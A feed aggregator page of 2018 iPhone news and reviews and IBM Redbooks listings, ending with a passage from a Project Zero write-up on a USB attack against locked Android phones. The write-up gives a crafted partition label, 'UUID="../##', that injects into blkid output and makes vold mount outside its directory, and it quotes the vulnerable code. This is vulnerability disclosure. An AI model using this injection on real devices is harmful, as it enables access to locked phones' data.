Feed aggregator

In the news

iPhone J.D. - 8 hours 41 min ago

Many of Apple's newest products go on sale today, including the iPhone XS, the iPhone XS Max, and the Apple Watch Series 4.  (The iPhone XR will be available in stores starting October 26.)  Using the Deliveries app on my current iPhone, I've been monitoring my iPhone Xs this week as it went from Shenzhen, China to Anchorage, Alaska to Louisville, Kentucky, and as I type this it should soon be on an early Friday morning plane to New Orleans.  My own travel over the last few days has been far less interesting because my days have mostly been consumed with drafting appellate briefs.  This has been a crazy busy week in the world of iOS-related stories, thanks to the new version of iOS and watchOS that came out earlier this week, the numerous reviews written by folks who got early looks at the new iPhones and new Apple Watch, and tons of app updates to take advantage of the new features in iOS 12.  I've tried to select some of the most interesting items to feature in this collection of the news of note from the past week:

  • California attorney David Sparks posted a video review of the Elevation Labs Draft Table, a strong and sturdy stand that can tilt your iPad to various angles.  I like that it can be adjusted to different angles.  In my law practice, I mostly use my iPad Pro in two different angles.  First, when I am taking handwritten notes, and sometimes when I am annotating documents, I prefer a slight tilt, and the Apple Smart Cover is perfect for that.  Second, when I am mostly reading things on the screen and doing some light annotation, I prefer a more upright position, and for that, I love the strong and sturdy Simplex Tablet iPad Stand by Thought Out (my review).  The Simplex only has one viewing angle, but I find that it is the only angle that I need other than the one I get with my Apple Smart Cover.  Whatever product you use, I think that getting your iPad in the right angle for the work you are doing is a key part of being more productive with an iPad in a law practice.
  • Suzanne Barlyn of Reuters reported this week that John Hancock, one of the oldest life insurers in North America, will stop underwriting traditional life insurance policies and instead will only offer policies that adjust the life insurance premiums based upon how much you exercise, as measured by a wearable device such as the Apple Watch.
  • To get you ready for your new insurance policy, let's start with some news items about the Apple Watch.  I wasn't surprised to see reviews of the new Series 4 Apple Watch this week by traditional media outlets, but I was surprised to see a review by Jon Hamm — yes, that Jon Hamm, of Mad Men — who talked to John Lonsdale of Men's Journal about his thoughts on the new device.  Hamm says:  "It’s not as chunky on your wrist, but the face is bigger, so if you have fat fingers like me, you can press those little buttons and it all works well."
  • Stephen Pulvirent of Hodinkee, who specializes in reviewing expensive watches, wrote a great review of the Series 4 Apple Watch.  The video which accompanies the review is beautifully produced and informative.  Given his job, it is no surprise that he concludes by saying that he still plans to wear his Rolex most days, but he admits that he is going to keep a Series 4 charged and ready to go for certain days, and says that "Apple is on a trajectory where each new version of the Apple Watch gets more useful, cooler, more fun to wear, and we're on a path where at some point, it's just going to become indispensable.  And with the Apple Watch Series 4, Apple is showing us that that future is closer than we thought."  I've never owned a Rolex or other super-expensive traditional watch, and because I love wearing an Apple Watch so much, I'm quite certain that I never will.
  • Liz Plosser of Women's Health says that the new Apple Watch is a "powerful health and fitness accessory."
  • The new Series 4 Apple Watch looks amazing, but almost every Apple Watch model got better this week thanks to watchOS 5.  Alex Guyot wrote a comprehensive review of watchOS 5 for MacStories.
  • The other new Apple hardware in the news this week was the iPhone XS.  Rene Ritchie of iMore wrote a comprehensive review of the iPhone XS.
  • David Pogue of Yahoo reviews the new iPhone XS and, as always, includes one of his funny and goofy videos to go along with it.
  • Travel photographer Austin Mann shows that the new iPhone XS does a great job of capturing what people actually see with their eyes, thanks to the HDR improvements.
  • Former White House photographer Pete Souza took some amazing pictures for DailyMail with the new iPhone XS in Washington, D.C.
  • Almost every model of the iPhone got better this week thanks to iOS 12.  Jason Snell of Six Colors explains the improved search feature in Photos in iOS 12 which allows you to, for example, see pictures you have taken of dogs, and then refine that to just see pictures of dogs in the snow.
  • I love, love, love, love, love the deep integration of 1Password into iOS 12.  Ryan Christoffel of MacStories shows off how it works.  If you still don't use a password manager, now that iOS 12 is out, you really don't have an excuse.
  • Overcast was already my favorite podcast app, but it is now so much better with iOS 12 and watchOS 5.  I particularly love the ability to listen to podcasts using just my Apple Watch and my AirPods, which is great for doing tasks around the house without having to carry around an iPhone.  I haven't yet used this combination when walking or jogging outside, but I look forward to trying that out soon.  Zac Hall of 9to5Mac wrote a good review of what is new in Overcast on the iPhone and Apple Watch.
  • It's going to take me months to get my arms around the new automation that is now possible thanks to Siri Shortcuts and the Shortcuts app in iOS 12.  But as if that wasn't enough, Federico Viticci of MacStories figured out how to trigger IFTTT applets using Siri and the Shortcuts app, which gives you the ability to trigger hundreds of additional services and devices such as a Sonos, a Roomba, an online document, and more.
  • Steven Levy wrote a great article for Wired about the history of Apple's Infinite Loop campus, based on interviews with tons of folks connected with Apple.
  • And finally, here is a video produced by Apple which shows off the major new features of the iPhone XS in just one minute:

Categories: iPhone Web Sites

Initial reviews of the new iPhone XS

iPhone J.D. - Wed, 09/19/2018 - 02:12

A few days ago, Apple provided select members of the press with an iPhone XS and an iPhone XS Max so that they could post a review yesterday, shortly before the 2018 versions of the iPhone officially go on sale this Friday.  Review units were given to John Gruber of Daring Fireball (review), Matthew Panzarino of TechCrunch (review), Joanna Stern of the Wall Street Journal (review), Nilay Patel (a former practicing attorney) at The Verge (review), Raymond Wong of Mashable (review), John Paczkowski of BuzzFeed (review), Brian X. Chen of the New York Times (review), Lauren Goode of Wired (review), Todd Haselton of CNBC (review), and Scott Stein of CNET (review).  Here are my major takeaways from what these folks wrote after using the new iPhones for the last few days:

  • Many people found the camera to be much better than the iPhone X.  John Gruber was particularly impressed, and the photos that he provided as examples show that the iPhone XS produces noticeably better pictures than the iPhone X in situations in which HDR makes a difference — pictures in which you have both light and dark spots.  If you are taking pictures outside on a nice day, this may not matter very much.  But if you are inside with less light, this can make a big difference.  Similarly, Matthew Panzarino provided some stunning sample pictures and said that he thinks Apple "dramatically undersold how much improved photos are from the iPhone X to the iPhone XS.  It’s extreme, and it has to do with a technique Apple calls Smart HDR."  And Nilay Patel says that the "camera upgrades on the XS over the X are significant. The XS makes the X camera look terrible most of the time."  (Patel still prefers the pictures taken by the Google Pixel 2, but when I looked at his sample pictures, I preferred the iPhone XS picture over the Google Pixel 2 picture every time.  Just goes to show you that there is certainly a subjective element to an art like photography.)
  • On the other hand, some of the other reviewers were less impressed with the camera.  For example, John Paczkowski said that the iPhone XS pictures were better than ones he took with the iPhone X, and yet it was still "pretty hard to tell" the difference.  And Lauren Goode said that pictures taken with the iPhone XS were only "slightly improved from the iPhone X photos," although she did see a more noticeable improvement in portrait mode photos.
  • Considering that you can actually see how much better the pictures are in the reviews posted by folks like Gruber and Panzarino, I find myself believing that the iPhone XS camera really is a big improvement over the iPhone X, but only some of the time, and perhaps other reviewers were taking pictures in conditions in which the improvement was less noticeable.  As Joanna Stern noted:  "The smart HDR feature and new sensors did make for a more even and clear photo when shooting almost directly into brighter lights—plus crisper, more colorful low-light shots—but overall my photos looked similar to the ones I’ve taken with the X."  But she also found that autofocus and launching the camera is much faster.
  • If you like the idea of a bigger phone, the iPhone XS Max is a very nice bigger phone.  If you previously used a Plus model of an iPhone, then you know whether that type of size is too large for your hands.  But many reviewers, such as Brian X. Chen, said that after trying both, they preferred the iPhone XS size.  If you want an interesting perspective, check out the video at the top of the review by Joanna Stern in which she shows what an iPhone XS Max looks like in the hands of basketball player Gheorghe Muresan.
  • Only one reviewer, Todd Haselton, tested the improved water resistance of the iPhone XS.  He said that he put the iPhone XS "in a fountain about 1 foot deep for five minutes and it was totally fine after I took it out."
  • The screen on the iPhone XS is supposed to be more durable.  Nevertheless, Joanna Stern reported that the screen on her iPhone XS Max cracked after "a minor fall onto wood."
  • The built-in speakers are noticeably better.  Raymond Wong says that there is more separation between the left and right channels.  And many reviewers noted that the sound is noticeably louder.
  • The iPhone XS is noticeably faster.  Raymond Wong notes that complicated games like Fortnite play better on the iPhone XS.  And Joanna Stern noted that even "[e]veryday actions are faster too — even just pressing the reply button in the Gmail app."  Several folks noted that Face ID is also faster and thus works better.
  • If you use a wireless charger, it will work better with the iPhone XS because the iPhone XS is more forgiving about where you place the iPhone on the charger.

My iPhone XS is supposed to be delivered this Friday.  In light of these initial reviews, I'll definitely be taking lots of pictures this weekend to see what I think about the improvements.  And I hope that I notice the speed increases in everyday actions, as Joanna Stern pointed out.

Categories: iPhone Web Sites

IBM Spectrum Scale Security

IBM Redbooks Site - Tue, 09/18/2018 - 09:30
Redpaper, published: Tue, 18 Sep 2018

Storage systems must provide reliable and convenient data access to all authorized users while simultaneously preventing threats coming from outside or even inside the enterprise.

Categories: Technology

iOS 12 will be released today, along with watchOS 5

iPhone J.D. - Mon, 09/17/2018 - 01:05

Today, Apple will release as a software update the latest version of the operating system for the iPhone and iPad, iOS 12.  Apple previewed the features of iOS 12 three months ago, and you can click here to read what is new.  Note that I discussed the new version of FaceTime in that post, but Apple has decided to wait a little bit longer before rolling out the group FaceTime feature.

The feature that I am most looking forward to is Siri Shortcuts.  I like the Workflow app, and now that it is built-in to the operating system it will be so much more powerful.  I like that iOS 12 will recommend shortcuts to you, making this feature accessible to everyone.  But I'm especially interested to see all of the great shortcuts that power users will be able to dream up and share.

Moreover, when apps are updated to support shortcuts, they can become much more powerful.  Here's a great example.  I often wear my AirPods to listen to a podcast or music as I am walking through an airport to catch a flight.  With the TripIt app installed on my iPhone, I can say "Hey Siri, upcoming flight" and TripIt will (1) tell me my next flight number such as Delta 123, (2) tell me how long I have before the flight departs, (3) tell me the gate number, and (4) tell me the flight's status.  (Note that #4, flight status, is only available if you pay for the TripIt Pro service, but the other features work for everyone.)  That is precisely the information that I want as I'm walking through the airport, and if I'm wearing my AirPods, Siri can just talk to me without me needing to look down at my iPhone screen.  And this is just one example of what the TripIt app can do with shortcuts.  And TripIt is just one of countless apps that will be updated to support shortcuts.  This is cool stuff.

I'm also looking forward to the improvements to notifications.  In iOS 12, they are even easier to manage and organize.

It's always a good idea to back up your device before you install a major new update such as iOS 12.  Last night, I backed up my iPhone and my iPad to my iMac so that I would be ready.  The update is typically available around 10am Pacific / 1pm Eastern, and I always recommend that you wait a few hours before updating because there have been a few times in the past when Apple had to pull an update shortly after release because a bug was discovered.

watchOS 5

In addition to iOS 12, Apple is also releasing watchOS 5 today.  I discussed the major new features in this post.  There are fitness improvements, the new Walkie-Talkie feature, support for Siri Shortcuts, podcast support, improved notifications, and more.  Thus, if you already have an Apple Watch on your wrist, today it gets better.

Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 09/14/2018 - 03:29

Early this morning, Apple started taking orders for the iPhone XS, the iPhone XS Max, and the newly redesigned Series 4 version of the Apple Watch.  I placed orders for an iPhone XS and the Series 4 Apple Watch.  At the time that I placed my orders, the delivery date for the iPhone XS and the aluminum version of the Series 4 Apple Watch was September 21.  However, I ordered the Stainless Steel version of the Apple Watch, and even though I placed my order immediately when the Apple Store opened, my Stainless Steel model has a delivery date of September 28 to October 2.  For folks looking to get the iPhone XS Max, I see that it did not take very long for delivery dates to go past September 21 for many of the configurations.  It will be interesting to see what kind of demand there is for all of the new products announced this week and how far back the delivery dates start to slip.  And now, the news of note from this busy week in the iPhone and Apple Watch world:

  • One of the notable new features in the Series 4 Apple Watch is the ability to perform an EKG.  Christina Farr of CNBC has an excellent explanation of this new feature and what it can do.
  • In addition to selling AppleCare+ for the iPhone, Apple has started a new insurance program called AppleCare+ with Theft and Loss.  As the name implies, this program will cover two incidents of accidental damage, theft, or loss, although there is a deductible.  Get more information on the Apple website.
  • Christina Passariello of the Washington Post talked to Apple's design chief, Jony Ive, about the new Apple Watch.
  • Last year, Apple announced the AirPower charging pad, but it still hasn't been released, and most references to it were removed from the Apple website this week.  Mike Wuerthele of AppleInsider has some theories on why.
  • Readdle makes some of the most useful apps for attorneys including Scanner Pro (which I use on my iPhone every week, and sometimes every day) and PDF Expert.  Killian Bell of Cult of Mac reports that the company's apps have now been downloaded 100 million times.  Congrats, Readdle!
  • You can now use Apple Pay at nearly all 7-Eleven stores, as reported by Juli Clover of MacRumors.
  • It is widely known that Apple is planning to open its own video streaming service in the future.  Ben Lovejoy of 9to5Mac reports that Apple just won its first Emmy award for Apple-produced content, this one for Carpool Karaoke.  I suspect that this won't be Apple's last Emmy for a TV show.
  • If you own an Apple HomePod, it's going to get better next week.  As Ryan Christoffel of MacStories reports, the device will gain support for multiple timers, phone calls, and the ability to play a song if you don't know the name but you do know a line of the lyrics.
  • Geoffrey Fowler of the Washington Post discusses the challenges with recycling consumer electronics such as iPhones and iPads containing lithium-ion batteries.
  • In what almost seemed like a response to that article by Fowler, Apple's keynote featured a presentation by Lisa Jackson, Apple's Vice President in charge of environment, policy and social initiatives.  (She is also the former administrator of the EPA.)  Horace Dediu of Asymco discusses the most interesting aspects of Jackson's presentation.
  • And finally, Apple released lots of videos in connection with this week's announcements, but today I'm just picking one that is silly and fun.  The opening video for this week's keynote address features someone running across Apple's new campus in Mission: Impossible style.  (As Roger Fingas of AppleInsider points out, Apple took some liberties with the path used by this runner.)  The video is entertaining, and also gives you some good views of Apple's new campus:

Categories: iPhone Web Sites

Why lawyers will love the iPhone Xs

iPhone J.D. - Thu, 09/13/2018 - 02:41

There have been four times in the past when Apple has debuted a major new iPhone with a new hardware design, and then the next year has debuted an "s" model:  the iPhone 3GS, iPhone 4S, iPhone 5s, and iPhone 6s.  These "s" models contain new features, sometimes even new hardware features, but the main emphasis seems to be on deeply improving the prior year's model.  Many lawyers have told me that they buy a new iPhone every two years and prefer to buy on the "s" year because that is when Apple really perfects each generation of iPhone.  Yesterday, Apple debuted the new iPhone XS (pronounced "ten ess"), and it fits this model perfectly.  The iPhone XS answers the question of what can we do if we take the basic hardware of the iPhone X, with that beautiful OLED edge-to-edge screen, and then deeply improve it.

One of the most notable ways that Apple has improved upon the iPhone X model is by releasing three different versions of the iPhone XS.  The main model adds the typical types of improvements that we would expect for an "s" model.  But Apple also introduced two other versions of the iPhone XS:  one for people who want an even bigger screen called the iPhone XS Max, and one for people who want to save some money but still get most of the good stuff called the iPhone XR.  Add to this that many of the older iPhone models are still available for sale at cheaper prices, and there is truly an iPhone for everyone.

I'll start by discussing the improvements over the iPhone X that exist in both the main model and the larger Max model — and most of these improvements also exist in the cheaper iPhone XR model.


For a while now, Apple has been designing its own CPUs, allowing the company to create amazing processors which make the iPhone more powerful every year.  For the 2018 iPhone, Apple has added the new A12 Bionic chip.  As you would expect, this new CPU is faster and more energy efficient than prior models.  But to give the A12 an additional boost, Apple added the Neural Engine, a part of the chip dedicated to the task of machine learning.

Thanks to the Neural Engine, the iPhone XS can recognize patterns, make predictions, and learn from experience, and do all of this while performing five trillion operations per second.  In other words, the iPhone is smarter and faster.  The Neural Engine is especially useful for the camera (more on that below), but also allows the iPhone XS to perform more sophisticated computations.  Augmented Reality should be significantly better on the iPhone XS.

Obviously this makes the iPhone better for CPU-intensive apps like sophisticated games.  But even if you are just drafting an email to a client, surfing the web, or looking at photos, a faster iPhone is a more responsive iPhone, which always makes an iPhone more pleasant to use.

Speaking of making the iPhone faster, the iPhone XS also adds support for Gigabit-class LTE, a faster version of 4G as 5G is still being developed.  My carrier, AT&T, currently has Gigabit LTE in 141 markets.  Gigabit LTE should be about twice as fast as 4G, up to 400 Mbps.  In the real world, I typically see LTE download speeds of around 150 Mbps where I live in New Orleans, whereas if I am close to the Wi-Fi router in my house I see wireless download speeds from my cable modem of around 330 Mbps.  I'll be curious to see if Gigabit LTE is just as fast as Wi-Fi at my house — and significantly faster when I'm not close to the Wi-Fi router — after I upgrade to the iPhone XS.


It is truly amazing how far the camera on the iPhone has come in the last decade.  Apple says that the newest iPhone has the best camera yet.  It looks like there are only minor improvements in the camera hardware.  Just like the iPhone X, the iPhone XS has two 12 megapixel cameras on the rear, one of which is a wide-angle f/1.8 lens and one of which is a telephoto f/2.4 lens.  I love having that telephoto lens on my iPhone X, and if you haven't used an iPhone with this feature before, you'll love it.  There are so many times that I am taking a picture with my iPhone and I want to get closer, such as when I'm taking a picture of my daughter kicking the soccer ball when she is across a soccer field from me.  For both pictures and video, that telephoto lens is a nice feature.

The main thing that is new for the iPhone XS in terms of taking pictures is that the chip features an improved image signal processor which does a heck of a lot more.  As Apple noted yesterday, what really makes the iPhone camera better is the computational photography.  The new iPhone XS performs up to a trillion operations on every photo you take.  For example, the iPhone XS adds a feature that Apple calls Smart HDR, an improved version of HDR photography.  Apple VP Phil Schiller describes it this way:

So let's say you're taking a picture and the camera recognizes you're shooting a subject and the subject is moving.  You go to press down on the shutter and you get a picture instantly.  It's called zero shutter lag.  What the A12 Bionic is actually doing is shooting a four-frame buffer so it can capture that critical moment.  But the A12 Bionic is doing even more than that.  It's also capturing secondary inter-frames at the same time.  And those inter-frames are shot at a different exposure level to bring out highlight details.  And it's doing more than that.  It's shooting a long exposure so it can get better shadow detail as well.  And when you're taking that picture it's analyzing all of those, finding out how to match up the best parts of each and merge them into one perfect photo.  That's Smart HDR.  It is a breakthrough, and it makes taking photos easier than ever to get beautiful results.

Apple also showed off a cool new feature when taking Portrait Mode photos — photos in which the subject of your picture is in focus but the background is blurred, similar to the bokeh effect you get with a high-end SLR camera.  There is now a slider to adjust the amount of blurring in the background, so you can decide if you want to see some of the background details, or if you want your subject to really stand out.

Although I normally think of using the camera to take pictures, the front-facing camera is also critical for Face ID.  Apple says that thanks to the advanced A12 Bionic CPU, Face ID is faster and works better on the iPhone XS.  It would be great if this was a noticeable improvement, and I can't wait to find out for myself.

Dual SIM

If you travel internationally with your iPhone, it is sometimes useful to get a different SIM card when you are in another country so that you can avoid expensive roaming charges.  The iPhone XS has a traditional SIM card but also supports a second eSIM.  When carriers support it — and Apple announced that many are on board — you'll be able to use two SIMs at the same time, and the iPhone will intelligently switch between them depending upon the circumstances.  Thus, you should be able to use a cheaper data plan in another country while still receiving phone calls when people call your normal phone number.

More waterproof

I'm sure that Apple would prefer that you not dunk your iPhone into the ocean.  But over time the iPhone has become more resistant to water, and this year the improvement is enough for Apple to increase the IP Code from IP67 to IP68.  The first number refers to how dust-proof the device is, and the iPhone X was already at 6, which is the highest.  But the increase from 7 to 8 is a noticeable increase in liquid ingress protection, to use the technical words.  With 7, a device can go up to 1 meter deep for up to 30 minutes.  With the 8 rating, Apple says that the iPhone XS can go up to 2 meters deep for up to 30 minutes.

Apple isn't advertising the iPhone XS as something you are going to use on your next snorkeling trip as an underwater camera.  Having said that, there are plenty of IP68 cameras being sold on Amazon which specifically advertise themselves as being waterproof and designed for underwater photography.  In part, this is because there is a wide range of ingress protection which all falls under IP68, but I suspect that if you wanted to be daring and take an underwater picture with an iPhone XS, you may not damage your phone at all.

More importantly, if you accidentally drop your iPhone XS in liquid, there is a good chance that you can just let the phone dry out and then it will be fine.  Yesterday, Apple VP Phil Schiller said that the iPhone XS was tested in many liquids, including orange juice, tea, wine, and even beer.

iPhone XS Max

Before the iPhone X, I felt like I had an impossible desire.  I wanted a larger screen, but I didn't want the iPhone to be any larger so that I could continue to use it without stretching my hand too much.  The solution, as the iPhone X showed us, was to reduce the bezels so that you get more screen space than a Plus model inside of hardware that is the same size as a non-Plus model.

But there are some folks out there who don't mind the larger size of the Plus model, and for those folks, Apple has created the iPhone XS Max.  The iPhone XS Max is about the same size as an iPhone 8 Plus, but because of the edge-to-edge design, you get a larger screen.  While the iPhone XS has a 5.8" screen, the iPhone XS Max has a 6.5" screen.  That's not that far off from an iPad mini, which has a 7.9" screen.  While the iPhone XS has a 2436-by-1125-pixel resolution, the iPhone XS Max has a 2688-by-1242-pixel resolution.  (Both are at 458 ppi.)

In terms of physical size, the iPhone XS is 5.65" x 2.79" while the iPhone XS Max is 6.20" x 3.05".

iPhones with a Plus-size screen have been around for a while now, so I suspect that you already know whether or not you are someone who minds the larger hardware size.  If the larger size isn't too big for your pocket or purse, then spending an extra $100 for the iPhone XS Max might be perfect for you.

iPhone XR

If you like the idea of the iPhone XS but you don't want to spend $999 and up for the iPhone XS or $1099 and up for the iPhone XS Max, you'll want to consider the iPhone XR.  Apple didn't say what the "R" stands for, but I presume the idea is that it is one step below "S" and that sounds about right.  The iPhone XR has almost all of the new features that I mentioned above, plus almost all of the features which have made the iPhone X so great.  However, the starting price is $250 less than the iPhone XS:  $749.

Here is what you lose by saving that $250 over the iPhone XS:

  • Display.  Instead of the beautiful high-resolution OLED display with its rich colors and deep blacks, you get an LCD screen, which is the type of screen which Apple used to always offer before the iPhone X.  Apple says that the LCD screen in the iPhone XR is particularly good, but it still won't look as good as an OLED screen.  And while the iPhone XS can show HDR video, much like newer high-end TVs, the iPhone XR cannot.
  • 3D Touch.  You cannot push harder on the screen to bring up different options.  As a workaround, Apple says that you can tap and hold down on the screen for a certain amount of time to trigger the same options — not unlike the way it works on an iPad — and Apple even adds some haptic feedback to reinforce that you are using the substitute for true 3D Touch.
  • Size.  The iPhone XR is actually slightly larger than the iPhone XS with a 6.1" screen, but it is definitely smaller than the iPhone XS Max with its 6.5" screen.
  • Camera.  You only get one camera on the back, so you don't get the telephoto lens.
  • Less waterproof.  The IP rating is IP67, the same as the iPhone X.
  • LTE.  You just get regular LTE, not Gigabit-class LTE.

Having said that, it is not all compromises with the iPhone XR.  You also get one feature that you don't get with the iPhone XS (or the iPhone XS Max):  more colors.  While the iPhone XS comes in silver, space gray, or gold, the iPhone XR comes in blue, white, black, yellow, coral, and red.  And I understand from folks who saw the new iPhone XR in person yesterday that the colors are quite vibrant.  Keep in mind that if you are going to keep your iPhone in a case the whole time, you might not notice the color very much.


The new 2018 iPhones look to be great for any lawyer, or anyone else who is looking to get work done with an iPhone.  With the large, edge-to-edge screen, you can see even more of your documents, your email, etc., and the faster speed allows your iPhone to help you get your work done without getting in the way.  And thanks to the three different models, you can now decide whether you want to pay $250 less to give up a few features that might not even matter to you, or pay $100 more for an even larger screen.  With all models offered in 64 GB, 256 GB or 512 GB capacities, you can decide how much space you want.  (The 256 GB model is $150 more than the base price 64 GB model, and the 512 GB model is $350 more than the 64 GB model.)  And since I presume that you will also use your iPhone for non-work purposes, such as taking pictures of the kids, playing games, or using the latest Augmented Reality app, the new 2018 models are even better at those tasks.

If you currently use an iPhone X, you probably won't want to upgrade unless you enjoy having the latest and greatest.  But if you currently use an older iPhone, then you'll love using the iPhone X form factor, and as a bonus for waiting an extra year for the "s" model, you can get an iPhone which is significantly improved over the iPhone X with more options on size and price.

What am I going to get?  My current iPhone X typically has about 150 GB in use, so I know that the 64 GB model is not enough for me, and the 256 GB sounds just right.  I don't like a larger phone, but I do want that amazing OLED display.  Thus, I plan to get the iPhone XS in the 256 GB capacity, probably in space gray.

Apple starts taking orders tomorrow, September 14th, and devices will begin shipping on September 21st, for the iPhone XS and iPhone XS Max models.  If you want the iPhone XR, you can order starting October 19, and devices ship a week later.

Categories: iPhone Web Sites

How to Use IBM Cloud Object Storage When Building and Operating Cloud Native Applications

IBM Redbooks Site - Wed, 09/12/2018 - 09:30
Redpaper, published: Wed, 12 Sep 2018

This IBM® Redpaper™ publication presents a series of tutorials for cloud native developers just getting started with IBM Cloud™ and IBM Cloud Object Storage.

Categories: Technology

IBM Power Systems LC921 and LC922: Technical Overview and Introduction

IBM Redbooks Site - Wed, 09/12/2018 - 09:30
Redpaper, published: Wed, 12 Sep 2018

This IBM® Redpaper™ publication is a comprehensive guide that covers the IBM Power Systems™ LC921 and LC922 (9006-12P and 9006-22P) servers, which use the current IBM POWER9™ processor-based technology and support Linux operating systems (OSes).

Categories: Technology

New iPhone (and more) to be announced today

iPhone J.D. - Wed, 09/12/2018 - 00:31

Today at 10am Pacific / 1pm Eastern, Apple will give a keynote presentation at the Steve Jobs Theater, part of Apple's new Apple Park campus in Cupertino, CA.  We will definitely see the 2018 versions of the iPhone, and I expect to see a new Apple Watch.  I'm sure that Apple will also say something about iOS 12, which Apple first previewed this past June and which I suspect will be released in the next week or so.

Other than that, I'm not sure what Apple will announce.  For example, I expect to see a new iPad Pro this year, but I don't know if we will see it today.  Sometimes Apple has announced a new iPad and a new iPhone at the same time; other times Apple holds back the iPad announcement until the next month.

Finally, it is always fun when there are surprise announcements, so I hope that something interesting is announced today that I wasn't expecting at all.

If you want to see the announcements live as they happen, click here to watch a live stream from the Apple website.


Categories: iPhone Web Sites

Turning Data into Insight with IBM Machine Learning for z/OS

IBM Redbooks Site - Tue, 09/11/2018 - 09:30
Redbook, published: Tue, 11 Sep 2018

The exponential growth in data over the last decade coupled with a drastic drop in cost of storage has enabled organizations to amass a large amount of data.

Categories: Technology

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

Google Project Zero - Mon, 09/10/2018 - 12:18
Posted by Jann Horn, Google Project Zero
Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).
After an Android phone has been unlocked once on boot (on newer devices, using the "Unlock for all features and data" screen; on older devices, using the "To start Android, enter your password" screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data. (Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)
The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at:
  • https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 ("directory traversal over USB via injection in blkid output")
  • https://bugs.chromium.org/p/project-zero/issues/detail?id=1590 ("privesc zygote->init; chain from USB")
These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).

The attack surface

Many Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn't necessarily complete):
  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.

This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel's filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold (one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.
The bug (part 1): Determining partition attributes

When a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: Label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which can not store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.
To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:
/dev/block/sda1: LABEL="<label>" UUID="<uuid>" TYPE="<type>"
However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid's output only scanned for the first occurrences of UUID=" and TYPE=". Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.

The bug (part 2): Mounting the filesystem

When vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel's vfat filesystem implementation should be able to mount, PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:
    if (mFsType != "vfat") {
        LOG(ERROR) << getId() << " unsupported filesystem " << mFsType;
        return -EIO;
    }

    if (vfat::Check(mDevPath)) {
        LOG(ERROR) << getId() << " failed filesystem check";
        return -EIO;
    }

    // Use UUID as stable name, if available
    std::string stableName = getId();
    if (!mFsUuid.empty()) {
        stableName = mFsUuid;
    }

    mRawPath = StringPrintf("/mnt/media_rw/%s", stableName.c_str());
    [...]
    if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {
        PLOG(ERROR) << getId() << " failed to create mount points";
        return -errno;
    }

    if (vfat::Mount(mDevPath, mRawPath, false, false, false,
            AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {
        PLOG(ERROR) << getId() << " failed to mount " << mDevPath;
        return -EIO;
    }
The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.
This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is 'UUID="../##' into a locked phone, the phone will mount that USB stick to /mnt/##.
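The injection and the path construction described above, as an added example (this is not code from the post or from vold): a small model of the blkid output line, the first-occurrence scan that consumed it, and the mount path built from the result, next to a hardened version that refuses a UUID that does not look like one. The function names (parseBlkidLine, buildMountPath, isSaneFatUuid, buildMountPathSafe), the volume id "public:8,1" and the volume serial "1234-ABCD" are assumptions made for the example; the XXXX-XXXX shape is how blkid reports a FAT volume id.

```cpp
// Added example: a model of how vold consumed blkid's output line and built the
// mount path, beside a hardened version. Not vold's code; names are hypothetical.
#include <cctype>
#include <cstdio>
#include <cstring>
#include <string>
#include <vector>

struct BlkidResult {
    std::string label, uuid, type;
};

// Value between the first occurrence of `key` (e.g. UUID=") and the next double
// quote. This is the "scan for the first occurrence" behaviour the bug relies on.
static std::string valueAfter(const std::string& line, const char* key) {
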